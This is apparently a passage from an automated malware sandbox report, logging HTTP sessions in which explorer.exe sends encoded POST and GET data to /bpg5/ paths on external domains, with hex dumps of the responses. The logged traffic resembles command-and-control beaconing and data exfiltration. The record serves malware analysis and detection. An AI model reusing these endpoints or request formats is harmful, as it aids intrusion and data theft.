                                                  Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a
                                                  Data Ascii: 3e4H+<huFO0{2J:iWh%HB =" 9$#/*=h^v?`?`O^I2?";72`itMzsNO'!?)|q#)JZ}t9/yVT0K+V_>Qu8.ei\$q$?K=B\=-ZH_#M({Iu'RhXY*hBc/iI~s|4*<~reVp")9bfk$%[p(7!y|0J+ga}B:(-b\%Q9;KhYJah()eE8|*G_)Vr3IWUIsAg<\(XpF&s1\9YY&.9YavZF1qNYyOpFS2{&DH2$#'_>JKXUysQ<\,=9S2+Cj("/NS'}q?|mf'G!~]zK_?vosER_9"N?L@="eUcEx"lQB@rZTo_>efJ@Z)PF8PXSrcvvF*RUE"*5[z
                                                  May 25, 2023 11:37:07.054255009 CEST60INData Raw: cb cf d6 ae b8 bb 68 9d 07 0a 67 19 16 94 a6 e5 31 ab 66 bf e5 07 2b 16 e0 e6 13 4c 94 84 c9 32 b1 d6 be 49 06 3a 9f d4 f1 37 f2 f4 cf ff b5 d9 94 14 55 1c 26 34 c8 cf bb 24 2e 8f 34 7a aa 62 05 e1 27 31 f5 4c f3 ac 5e e2 aa a2 45 10 92 22 92 a0
                                                  Data Ascii: hg1f+L2I:7U&4$.4zb'1L^E"oO(-O=7zDpB&N$kiWueGSE^k-lk~qJO$
                                                  May 25, 2023 11:37:07.054322958 CEST62INData Raw: 31 36 61 30 0d 0a a9 68 91 92 8a 8a 4d 9f e4 79 c2 f5 d9 cf 45 59 fe e1 f5 94 7c 72 70 7a bf 7c b2 08 be f3 0f 0a f2 c7 73 f6 e8 fc f9 4f ff ef 9f ff cb 7f fd f3 9f fe ff 3f ff e9 ff 91 77 65 7d 3d ef 29 8d 3e 83 40 37 06 c8 ed 68 f8 2f ff ed cf
                                                  Data Ascii: 16a0hMyEY|rpz|sO?we}=)>@7h/?}0K:e~QH)o<b/S?|G_~d-0+[?3l_a=Tb9zQ%=5Je~)-HW?95f?YC0?y
                                                  May 25, 2023 11:37:07.054371119 CEST63INData Raw: bd 94 b7 83 01 30 da 18 09 94 77 22 77 2a c1 6b 7e e0 dd 45 51 3b 0d 28 42 0d eb b0 73 7d 16 73 00 97 18 a9 29 1c 00 83 29 09 a2 a3 61 c0 6a 7c a8 b5 16 e9 e0 76 aa e3 44 22 25 30 46 51 d1 43 56 c4 3d fc 25 21 11 4d 99 80 e3 a1 c7 77 03 b6 f8 e7
                                                  Data Ascii: 0w"w*k~EQ;(Bs}s))aj|vD"%0FQCV=%!MwAo6{ygR&"|ONq&#D})H.9_%M5K{8SEJM!P&i^KG<u7!7,glWxo~AX8TaHAk*yc~(U_-86\UCyL
                                                  May 25, 2023 11:37:07.054415941 CEST64INData Raw: f5 1e a6 8d 5f 3a 32 78 c5 19 d3 54 3d 9a 3b f9 d4 06 c1 a4 49 ba d3 57 c4 b6 06 af 83 82 f9 dc d1 7d 56 c8 c1 1c 38 6d ed 2d 4d b4 fc 7e 43 f2 7f e8 d8 95 ad fd 99 16 4f 4f cd 15 87 be 3c cc b6 82 65 92 b4 e9 9d 84 94 d5 31 46 38 88 2e 34 6d 3d
                                                  Data Ascii: _:2xT=;IW}V8m-M~COO<e1F8.4m=z#qr#yc0YdWf\xS{]s%&gU2[X>YA;vWX X>]('z14c?N|lo->~w*-\hX@Y>=\
                                                  May 25, 2023 11:37:07.054461002 CEST66INData Raw: cd 60 80 1b e9 a3 f9 81 a5 c7 0d bc e6 bd e5 c5 07 39 d6 94 07 7a 58 61 4e 0a 92 24 e4 d5 38 26 41 7c da 7e 7c 62 a5 61 a4 79 41 89 aa 9b f7 63 ab d2 47 7e 01 46 aa 8a 84 47 48 8e 10 ec e3 57 1a c9 6f 18 0b 9a 53 02 99 24 20 eb 01 25 4a 9e 59 48
                                                  Data Ascii: `9zXaN$8&A|~|bayAcG~FGHWoS$ %JYH]WroeXdIBHra#^'E4:4rO>d_`Z%G6:({mYInS.s1mQi/'}7|oxajC:H/xsuQDSa@zX:
                                                  May 25, 2023 11:37:07.054502964 CEST66INData Raw: 30 0b a3 0b 12 d8 1a 4a e2 71 11 1a 81 ee 11 b3 88 d7 1a ca ac 4f de 75 3e 75 d9 57 35 fa c5 2d d9 6b 01 76 1d 7b 2d 80 ae 64 af 05 92 c1 5e a8 0c 23 55 e8 5e 2c a0 c0 fa 62 01 25 b3 67 eb 35 16 60 1f 66 7b d5 dc 5d de 92 bb 16 60 d7 71 d7 02 e8
                                                  Data Ascii: 0JqOu>uW5-kv{-d^#U^,b%g5`f{]`qJZ ].N+%S-cL@T<]`JZ ]fq6%w-@l]m|_^-kvw-Eg+lx.jm`>BmQV@f
                                                  May 25, 2023 11:37:07.054552078 CEST68INData Raw: 31 36 61 30 0d 0a a3 74 8a 61 f5 e5 e8 57 cb f5 58 ef be 51 fc 8c 77 4e 6e e7 98 c4 a3 48 29 ae 72 20 6f 07 c5 5f fc 4d 7c 82 ac 25 24 ad ec 8f 55 87 e2 96 ee 78 9b 8c ac 7f b5 f0 04 7f 91 bf aa af 4d d5 2a 99 3c 58 61 ed fd f0 68 8f 55 f0 9c 6d
                                                  Data Ascii: 16a0taWXQwNnH)r o_M|%$UxM*<XahUmZv)=5&O'E;5WF=.r(|W %&1-#/cEvN#"&vw|G{9~8fHD<{dADt%i\$ib^,eS; p2.BPgS}E'
                                                  May 25, 2023 11:37:07.054600000 CEST69INData Raw: 53 eb 95 78 e5 fc 28 29 8d dc 40 9a 63 2b e5 7d 1c be 26 e2 37 b2 f8 b3 74 da 70 12 f2 ac 6c 5b a7 2d 8d 1b 73 40 0d 4f 99 b7 82 97 cd 04 4e 1f 2e dc 8e 1e b5 dd 2b 93 f9 f4 94 c4 65 f5 0e 7f f0 23 01 17 da a5 cd 00 87 68 ec 51 f8 95 41 74 92 f8
                                                  Data Ascii: Sx()@c+}&7tpl[-s@ON.+e#hQAt=L()@?;.1%f;1Uvy(zi2v$f!}D'1z00qHv~1tDb0K=%W:zt5#`kg/7(k
                                                  May 25, 2023 11:37:07.054650068 CEST70INData Raw: e3 4b dd 63 2f e2 98 f1 93 93 30 ae de 02 cf 34 83 b2 32 c6 da 78 4d 5a de 2c 67 2f 67 30 6b 30 fb 91 17 00 70 66 7e e9 c0 66 48 8a 47 28 1b b0 8b 13 80 ca 2d 2a b6 a5 79 75 1d ee f9 ad d8 f5 b5 55 23 6b ff c5 d4 09 81 59 f2 6b a0 bf 17 d4 5d 90
                                                  Data Ascii: Kc/042xMZ,g/g0k0pf~fHG(-*yuU#kYk]<dsodPZI^q%f1gm|@o5V~XH'pRGn:>iKE6*]Y</2u>+NAU;6e9M&qmj/Z8eF
                                                  May 25, 2023 11:37:07.325906038 CEST72INData Raw: 5a 2b 79 cc f2 64 9f 44 3c 48 59 91 2a 0e af b8 d1 fc 28 86 59 7d bc 7f 65 81 97 77 14 c3 47 a6 b8 e4 6d 4e ca bf 28 a7 4c f2 e4 6d d3 38 78 45 de f4 7c 3a 57 1f e3 7e f4 26 6a dd d9 b4 db 3c db 2b ee bf 1e 5d 7f 9d bd d6 6a 87 fd 75 48 69 b6 7d
                                                  Data Ascii: Z+ydD<HY*(Y}ewGmN(Lm8xE|:W~&j<+]juHi}MA=g>3`&hQuSZq#>;HglHmf\`X5s]H_7V_h!2[m`W5}X2&=-Q/C6&%zbODzq*<


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  11192.168.2.449711118.27.125.17280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:09.595468044 CEST171OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.rt66omm.com
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.rt66omm.com
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.rt66omm.com/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 62 6e 6a 75 75 75 38 66 33 6b 52 66 64 50 35 38 42 6d 30 74 43 37 68 34 74 4b 56 58 35 51 55 31 37 6d 37 68 4a 46 36 66 48 2d 51 69 76 58 31 72 4a 54 4e 53 73 64 78 36 70 56 6a 67 48 61 28 74 54 4e 4f 43 28 6c 74 57 33 6a 51 4c 35 31 4a 4f 67 37 64 30 45 5f 57 38 6d 33 34 50 76 45 48 49 64 73 68 4f 4a 4c 6a 69 31 73 43 43 30 46 6a 2d 6a 65 62 70 37 47 4e 78 4d 31 73 51 76 6f 71 54 34 43 39 34 69 6f 45 5f 51 47 61 51 4a 4a 68 62 65 33 33 6c 42 4c 64 4e 72 58 5a 4b 77 63 4c 44 78 39 7e 59 38 45 7e 4f 73 58 70 41 30 6c 48 30 36 51 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=bnjuuu8f3kRfdP58Bm0tC7h4tKVX5QU17m7hJF6fH-QivX1rJTNSsdx6pVjgHa(tTNOC(ltW3jQL51JOg7d0E_W8m34PvEHIdshOJLji1sCC0Fj-jebp7GNxM1sQvoqT4C94ioE_QGaQJJhbe33lBLdNrXZKwcLDx9~Y8E~OsXpA0lH06Q).
                                                  May 25, 2023 11:37:10.273732901 CEST172INHTTP/1.1 404 Not Found
                                                  Date: Thu, 25 May 2023 09:37:10 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Server: LiteSpeed
                                                  x-powered-by: PHP/8.1.19
                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                  link: <https://rt66omm.com/wp-json/>; rel="https://api.w.org/"
                                                  content-encoding: gzip
                                                  vary: Accept-Encoding,Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed
                                                  Data Raw: 39 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd db 8e e4 48 b2 18 f8 2b 3c 95 68 75 46 4f 30 8a 8c 7b 32 bb 4a 07 3a 82 04 69 57 17 68 25 48 42 a3 91 f0 20 3d 22 d8 c5 20 39 24 23 2f 9d 2a 3d 68 5e 76 3f 60 3f 60 a1 4f d0 83 5e f6 49 bf 32 3f 22 98 b9 3b e9 37 32 c8 60 e4 cc 81 a0 69 74 4d 17 c3 dd cc dc dc dc dd cc dc dc ec e7 bf 89 b2 b0 7a cb a9 73 ac 4e c9 d7 9f e1 4f 27 21 e9 e1 cb a7 df c8 a7 af 3f 1f 29 89 be fe 7c a2 15 71 c2 23 29 4a 5a 7d f9 74 ae f6 ee f6 13 ff 9a 92 13 fd f2 e9 39 a6 2f 79 56 54 9f 9c 30 4b 2b 9a 56 5f 3e bd c4 51 75 fc 12 d1 e7 38 a4 2e fe 65 ea c4 69 5c c5 24 71 cb 90 24 f4 8b 3f f3 a6 8e e8 e9 ee e3 ea 4b 98 3d d3 42 85 5c d0 3d 2d 0a 5a 48 90 d3 cc 15 5f dd 97 23 4d dd 28 7b 49 0f 05 89 a8 da 75 9f 15 27 52 b9 11 ad 68 58 c5 59 2a 81 a8 68 42 f3 63 96 d2 2f 69 f6 e9 eb cf 49 9c 7e 73 0a 9a 7c f9 94 17 34 cc d2 94 86 95 13 a5 a5 9b 03 a2 2a 3c 7e 72 8e 05 dd 7f f9 f4 f9 f3 cb cb cb ec 90 65 87 84 56 e4 70 22 29 39 d0 62 16 66 a7 6b a1 b8 24 25 c9 5b 15 87 e5 70 28 e4 37 f2 ca 89 21 79 7c 05 80 30 4a 7f 2b 67 61 92 9d a3 7d 42 0a 3a 9c 84 9c 1c 28 89 e6 9c 8a f2 2d 8d e2 90 00 b3 87 83 62 5c 25 51 39 3b cc a2 ec bc 4b 68 98 c4 e1 b7 59 4a ab 61 cc ad f2 f0 16 f4 90 68 1c 19 28 29 65 45 aa 38 1c ce 8c b0 a4 7c 0c c3 fb ee b3 b4 2a af 47 cd bb a3 8c 5f 29 56 a7 72 f6 c7 33 49 ab 92 16 cf 57 08 55 49 c3 73 41 67 87 82 3c 93 8a 5c b1 bc c2 28 9d c9 b2 58 bd c4 a7 c3 70 46 02 98 df ca 88 26 f1 73 31 5c 0c e3 13 39 d0 d2 dd d3 59 59 26 2e ff 1b 39 91 df af 59 1c 61 76 ca 13 8a 0b eb 5a 10 a7 d9 89 46 31 71 af ed 1f cf 4e 59 79 8c 4f d9 70 46 92 53 32 7b 26 c9 99 86 d9 e9 44 8b f0 0a 99 88 48 12 de 00 c6 ee 32 8c 24 23 d1 27 87 94 5f 3e c1 4a f8 e4 c0 e9 c8 fe fb f3 4b b6 df 8b a3 e0 58 55 79 f0 f9 73 51 ad d7 d9 e9 04 3c f9 fc 92 bb fc f8 fb 5c 1d e9 89 96 9f c3 2c cc b2 d4 3d 91 b2 a2 c5 e7 17 ba c3 c5 f5 39 0e b3 53 96 a5 9f 95 bf cd 18 f4 b0 c8 ca 32 2b e2 43 9c 6a 07 d3 05 c2 e6 b7 a0 0c 28 22 2f b4 cc 4e 94 53 27 7d 71 f9 00 90 d2 f9 3f 7c fe b2 9c 6d 66 de 27 47 21 b9 8a ab 84 7e 5d 7a 4b e7 5f fe ab 7f eb fc 93 7f f5 ef fe e5 3f 76 fe 93 f3 6f b2 73 45 9d f5 da c9 52 e7 5f bc 39 ff 22 4e a3 9f 3f b3 a6 4c bb 40 3d e2 c7 22 db 65 55 f9 63 ad 45 fc 78 22 af 6c e9 c0 51 0c ba 42 90 90 e2 40 7f fc cc d5 8f bc c8 72 5a 54 6f 5f 3e 65 87 00 66 4a d6 40 e8 ae 8c ab 5a 29 50 9a 46 b4 0c 8b 38 d7 d4 82 7f 12 a7 11 50 58 53 fb ef 8f a4 72 fe 63 76 76 fe cf ac ac fe 46 a8 17 2a 52 18 af 84 55 1d b9 f3 9f 1c db d8 ad 90 ce 45 22 c1 01 f9 2a 35 01 5b 7a
                                                  Data Ascii: 98cH+<huFO0{2J:iWh%HB =" 9$#/*=h^v?`?`O^I2?";72`itMzsNO'!?)|q#)JZ}t9/yVT0K+V_>Qu8.ei\$q$?K=B\=-ZH_#M({Iu'RhXY*hBc/iI~s|4*<~reVp")9bfk$%[p(7!y|0J+ga}B:(-b\%Q9;KhYJah()eE8|*G_)Vr3IWUIsAg<\(XpF&s1\9YY&.9YavZF1qNYyOpFS2{&DH2$#'_>JKXUysQ<\,=9S2+Cj("/NS'}q?|mf'G!~]zK_?vosER_9"N?L@="eUcEx"lQB@rZTo_>efJ@Z)PF8PXSrcvvF*RUE"*5[z
                                                  May 25, 2023 11:37:10.273816109 CEST174INData Raw: cb cf d6 ae b8 bb 68 9d 07 0a 67 19 16 94 a6 e5 31 ab 66 bf e5 07 2b 16 e0 e6 13 4c 94 84 c9 32 b1 d6 be 49 06 3a 9f d4 f1 37 f2 f4 cf ff b5 d9 94 14 55 1c 26 34 c8 cf bb 24 2e 8f 34 7a aa 62 05 e1 27 31 f5 4c f3 ac 5e e2 aa a2 45 10 92 22 92 a0
                                                  Data Ascii: hg1f+L2I:7U&4$.4zb'1L^E"oO(-O=7zDpB&N$kiWueGSE^k-lk~qJO$hMyEY|rpz|sO?we}=)>@7h/
                                                  May 25, 2023 11:37:10.273859024 CEST174INData Raw: b5 48 ed 30 e5 b5 64 5b 44 ab 50 28 d8 a6 ed c2 83 5c e8 f8 1d e4 b4 e3 67 36 81 13 63 97 54 54 71 6e 67 00 a8 80 9c ab 4c 18 1e 88 9b 7d e9 52 fd 7a 2b bb c6 76 5b f6 ee ca 4f 09 4d 9f 6e d7 16 65 b5 f8 06 da a7 cc 2e 69 14 e0 dc 4d 23 d2 6d 0e
                                                  Data Ascii: H0d[DP(\g6cTTqngL}Rz+v[OMne.iM#mFN%#?<'wQP'mu+aYd7.B3$!yIa+zjgnY?#r0w"w*k~EQ;(Bs}s))aj|vD"%0FQCV=%!MwAo6
                                                  May 25, 2023 11:37:10.273947954 CEST175INData Raw: 62 35 30 0d 0a 47 3c 75 10 37 fc 21 f5 d5 9c 37 b3 0d 2c dc bf c5 ab 67 e7 be f1 d0 6c b6 e0 57 78 6f 94 7e 41 58 03 38 cd 54 d0 df cd 61 cc 48 41 6b a3 2a 79 63 7e 28 1a b9 55 96 5f d6 2d 38 c6 36 18 5c b3 90 55 14 43 09 b8 00 82 79 b0 4c 4a e0
                                                  Data Ascii: b50G<u7!7,glWxo~AX8TaHAk*yc~(U_-86\UCyLJYR;)6[Lt\UvqB'R0czL<E-x6K-/CABdzifFmwgp:>^cRZhI],P>[PVgC
                                                  May 25, 2023 11:37:10.274017096 CEST177INData Raw: 76 b8 ab 57 7f d7 cc 97 1d fa 10 e6 58 20 58 3e 5d cb 16 0b 28 cb 27 d7 f7 7a 31 e4 bd 16 34 f5 e2 63 a8 f8 cc 3f 4e 7c 6c a0 6f 2d 3e f3 7e dc d2 77 2a 0b e3 2d 9f 5c db 08 da d7 96 05 82 e5 93 15 68 0f b6 58 40 59 3e b9 3d 19 d2 88 cf 5c 3f 26
                                                  Data Ascii: vWX X>]('z14c?N|lo->~w*-\hX@Y>=\?&m|H~vF0Z|l@{"+Ozjg1J|'>6=4H|uF0Z|l@{"+OnO4%>|$>FhXdF|D|r'>6=4H|*>lL!
                                                  May 25, 2023 11:37:10.274094105 CEST178INData Raw: 49 6e dd 53 86 a5 2e b2 08 73 31 6d 91 51 db 96 69 92 a3 2f c9 a7 27 7d 37 7c 17 6f ee 8c 0b 78 b6 bf 61 aa 6a 1d 8c f4 93 43 3a 7f 0c 48 08 2f 78 bb db ec b3 f0 ac e6 73 a8 75 51 44 ef 90 e0 08 53 61 40 b1 d2 c6 7a 58 db 3a a4 8d 1e 8e c6 4e 89
                                                  Data Ascii: InS.s1mQi/'}7|oxajC:H/xsuQDSa@zX:NBC2K[9~wFv>[[E15nz&8LCj}Qiz"F_6`G~Q&BI(~bl]84.UMl2r%K9l'
                                                  May 25, 2023 11:37:10.274148941 CEST179INData Raw: e3 ae 05 d0 95 dc b5 40 ba c8 dd e5 6c be 5d 6d 7c c6 dd d5 c6 5f 5e cd dd ed 2d b9 6b 01 76 1d 77 2d 80 ae e4 ae 05 d2 45 ee ce 67 2b c6 d9 11 fb 6c 8b e6 a5 78 d4 fc 81 2e c4 0b 6a cf 6d 60 cf ed 02 a1 bb 02 87 99 3e 42 85 b4 00 b7 b8 19 af 83
                                                  Data Ascii: @l]m|_^-kvw-Eg+lx.jm`>BmQV@fr\'j= |y-:Wk@3__KN-gAZ-umn{A5n|`kWWI@Ieo5Hu0:&Y': 7$
                                                  May 25, 2023 11:37:10.274204969 CEST180INData Raw: 11 38 91 dc 82 44 f1 b9 0c 1e 1e 1e 1e f2 57 39 55 d9 bd c8 55 06 60 d9 02 c0 07 be 13 27 2b 9c 7b fd 23 fb da d6 e5 5d e3 6e e3 c8 d1 48 e7 d9 ed 04 55 de a3 05 e2 b9 48 ee 7f 84 14 29 01 32 eb 73 f9 7c f8 c3 eb 29 79 3c 57 fb ed f4 e7 f2 f9 e0
                                                  Data Ascii: 8DW9UU`'+{#]nHUH)2s|)y<W<e_>y@]0>9$-|:VU|2{Yyy@gF~>9's"$?kS~C\~g#04cEND\.zg,#cq`
                                                  May 25, 2023 11:37:10.274259090 CEST182INData Raw: 31 36 61 30 0d 0a 76 e5 e1 e0 b6 7e 31 74 19 88 44 c5 62 30 15 4b 8d 0a fe c0 ee 01 3d 0d 17 99 00 bd 25 f4 cb c1 e8 57 3a 7a f4 81 b3 74 35 dd 23 87 9e 12 ea d5 60 d4 6b 0d b5 ec e1 f6 67 de d2 e7 2f 37 bb c9 00 28 12 19 6b 93 8c 96 95 f2 f4 04
                                                  Data Ascii: 16a0v~1tDb0K=%W:zt5#`kg/7(kk%hmM+?Z2DUBTB$r+~:TQc6[Mrcd&X,JJ{<_.O4fcylBTkg
                                                  May 25, 2023 11:37:10.274318933 CEST183INData Raw: 94 45 f7 e1 0b 36 ae 2a a8 b7 c3 1f c9 5d 59 ea 18 1d 3c b0 e0 2f 32 b7 80 1d 75 1b e4 e2 3e 2b 4e 41 91 55 a4 a2 f7 ee 03 e4 3b 9f d8 9d 0d d2 36 cc 9e 89 65 39 4d c1 0d 13 26 71 f8 6d c2 6a 2f 5a f7 0b cb 9c aa de ba 38 65 91 46 c1 1c f2 d5 d6
                                                  Data Ascii: E6*]Y</2u>+NAU;6e9M&qmj/Z8eFPf30(>4g%4VuB}cu!TeCB!EL\x[*lL]ssV-Y;vazE'fQ9}/PToS;d2@y21hONq&>6Eg
                                                  May 25, 2023 11:37:10.554032087 CEST184INData Raw: 5f bb a1 a7 85 82 19 01 13 d2 db bf da d2 68 0d 21 b2 8b cb 00 32 5b e6 d1 e6 6d 60 57 de 1f a9 35 7d b0 58 f4 14 32 26 3d 2d 51 2f 43 9c 96 36 26 aa b6 9d dd 89 c9 ec ff 0e 1f 25 0b 9b 7a 62 f7 a6 4f 09 d9 d1 44 ca ae e3 83 7a 87 71 2a 3c 04 65
                                                  Data Ascii: _h!2[m`W5}X2&=-Q/C6&%zbODzq*<eQ88_#_/ c8!pDp](^?xUf\+C(m+3-FbcFIV1{Ihs"oB{L"qUq4Mwl:Ve


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  12192.168.2.449712118.27.125.17280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:12.436496019 CEST283OUTGET /bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.rt66omm.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:37:12.766036034 CEST284INHTTP/1.1 301 Moved Permanently
                                                  Date: Thu, 25 May 2023 09:37:12 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 0
                                                  Connection: close
                                                  Server: LiteSpeed
                                                  x-powered-by: PHP/8.1.19
                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                  x-redirect-by: WordPress
                                                  location: http://rt66omm.com/bpg5/?lpw7=WlLOtZde/S0Bb5podjoZPKpN16VixTIJ6XzrElaVf+c4mV5kUnhNlslOlX/mHpTHfJOtj0AP0RUV6kopxuhfKJOii3EjlU32Tg==&UZCu=zJfEuRXw-P
                                                  vary: Accept-Encoding
                                                  x-turbo-charged-by: LiteSpeed


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  13192.168.2.449713183.90.228.4680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:18.356287003 CEST286OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.haynicorpon.biz
                                                  Connection: close
                                                  Content-Length: 1482
                                                  Cache-Control: no-cache
                                                  Origin: http://www.haynicorpon.biz
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.haynicorpon.biz/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 33 7e 30 73 38 58 67 52 44 6a 58 54 33 52 75 47 6b 67 66 32 30 49 50 78 77 33 65 7e 68 4e 5f 44 63 4e 4c 65 35 50 4f 36 4e 72 36 43 5a 33 33 71 66 31 38 4c 34 4e 75 49 42 50 43 36 2d 35 34 28 4b 49 6f 65 61 76 49 44 5a 4a 58 47 77 6b 31 39 36 57 43 32 55 58 68 45 41 54 6d 68 75 71 39 6f 4b 4a 74 77 68 5a 2d 59 71 6d 37 6d 58 59 37 71 75 49 54 73 6e 30 47 58 75 34 39 36 4c 45 50 34 59 4a 34 59 79 4c 4d 6f 64 78 36 6f 71 53 6e 38 50 56 36 75 65 71 64 70 68 33 6e 50 63 48 45 41 55 57 37 4a 39 45 6c 63 35 72 4a 70 78 55 52 74 73 52 4c 35 59 67 67 55 73 39 4c 66 33 59 36 45 61 36 77 6e 36 6a 6c 71 30 39 49 58 36 33 34 66 63 48 39 64 43 4f 47 72 34 52 77 6a 45 4d 31 36 58 63 38 53 61 57 43 67 64 53 4a 70 6e 38 37 55 4e 65 72 36 71 51 57 63 4f 53 51 54 67 36 76 6d 57 79 61 39 6c 5a 77 39 55 75 76 36 53 53 4d 56 57 41 6f 51 4d 63 47 50 48 28 2d 6b 63 33 6e 76 62 52 79 57 35 44 6d 75 49 49 31 36 58 46 4d 78 6d 55 63 47 74 50 4a 55 6b 6c 57 43 4f 73 4c 45 4a 28 7a 75 5a 6a 52 6b 49 6c 44 71 36 64 35 32 67 34 65 59 2d 38 71 39 32 5a 72 55 46 46 38 65 6d 62 4d 47 56 52 33 48 41 71 75 52 47 59 43 49 49 37 4f 44 61 44 5f 47 58 56 67 30 4e 6c 53 63 38 50 73 38 2d 65 30 4c 4d 65 56 47 32 46 4c 6e 32 47 55 72 31 56 36 4d 61 28 66 6f 52 6e 79 6d 77 66 43 63 73 4c 2d 39 59 7a 6c 37 76 75 47 6b 61 44 72 4b 73 4d 52 55 42 57 76 30 43 4a 33 38 49 55 77 45 35 66 4d 71 78 78 4a 72 4d 74 39 50 72 43 59 4a 73 64 31 73 75 68 32 4e 78 7e 54 73 6a 4d 58 5a 71 41 4c 32 38 32 76 39 36 56 6f 39 58 66 75 36 79 39 75 39 